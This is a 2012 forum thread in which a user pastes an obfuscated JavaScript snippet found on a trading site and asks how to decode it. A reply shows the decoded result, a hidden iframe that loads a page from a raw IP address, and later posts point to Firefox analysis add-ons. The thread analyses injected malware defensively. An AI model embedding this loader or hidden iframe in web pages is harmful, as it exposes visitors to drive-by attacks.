|
2012-05-07, 10:56 AM | #1 |
Me fail English? That's unpossible!
|
How to decode suspicious script?
I noticed this at a site I trade with, but I can't figure out how to decode it. Should I stop the trade even though I don't know what this does? It seems overly obfuscated to me.
Code:
<script>try{q=document.createElement("div");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#27.5#25#22#26.5#25.5#22#24#24.5#25#22#24#25#25#22.5#25#25.5#26#23.5#24#26.5#26.5#26.5#22#51#57#53.5#53#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#27.5#25#22#26.5#25.5#22#24#24.5#25#22#24#25#25#22.5#25#25.5#26#23.5#24#26.5#26.5#26.5#22#51#57#53.5#53#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-577!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}</script> |
2012-05-07, 11:24 AM | #2 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
Code:
<iframe src="http://94.75.234.244/45612777.html" style="visibility: hidden; position: absolute; left: 0px; top: 0px;" height="10" width="10"></iframe> (Firefox, View Generated Source from the Web Developers Toolkit)
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
2012-05-07, 01:03 PM | #3 |
Me fail English? That's unpossible!
|
Thanks cd!
I searched for Web Developers Toolkit for firefox but only found a reference to a 7 add-on collection. |
2012-05-07, 01:17 PM | #4 |
a.k.a. Sparky
Join Date: Sep 2004
Location: West Palm Beach, FL, USA
Posts: 2,396
|
http://livehttpheaders.mozdev.org/
http://chrispederick.com/work/web-developer/ these are probably the two handiest for tracking down things like this.
__________________
SnapReplay.com a different way to share photos - iPhone & Android |
|
|